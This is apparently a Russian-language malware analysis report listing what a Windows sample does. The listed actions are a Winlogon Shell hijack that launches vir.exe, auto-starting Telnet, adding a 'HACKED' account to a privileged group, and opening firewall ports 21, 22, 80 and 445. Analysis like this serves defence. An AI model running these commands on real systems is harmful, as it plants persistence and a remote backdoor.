Техническая информация
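- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] 'shell' = 'Explorer.exe c:vir.exe' (подмена параметра Shell: при входе пользователя в систему вместе с Explorer.exe запускается указанный файл vir.exe)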
- [<HKLM>\SYSTEM\ControlSet001\Services\TlntSvr] 'Start' = '00000002' (значение 2 — автоматический запуск службы Telnet при загрузке системы)
- <SYSTEM32>\net1.exe user HACKED 123456789 /add
- <SYSTEM32>\sc.exe start tlntsvr
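- <SYSTEM32>\net1.exe localgroup %USERNAME%s HACKED /add (учётная запись HACKED добавляется в локальную группу; «%USERNAME%s», по-видимому, — название группы Administrators, в котором анализатор заменил имя пользователя шаблоном)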
- <SYSTEM32>\regsvr32.exe /s <SYSTEM32>\tlntsvrp.dll
- <SYSTEM32>\tlntsvr.exe
- <SYSTEM32>\netsh.exe firewall add portopening tcp 21 MyWebPort Enable
- <SYSTEM32>\netsh.exe firewall add portopening tcp 80 MyWebPort Enable
- <SYSTEM32>\netsh.exe firewall add portopening tcp 22 MyWebPort Enable
- <SYSTEM32>\sc.exe config tlntsvr start= auto
- <SYSTEM32>\netsh.exe firewall add portopening tcp 445 MyWebPort Enable
- <Текущая директория>\start up.exe
- C:\vir.exe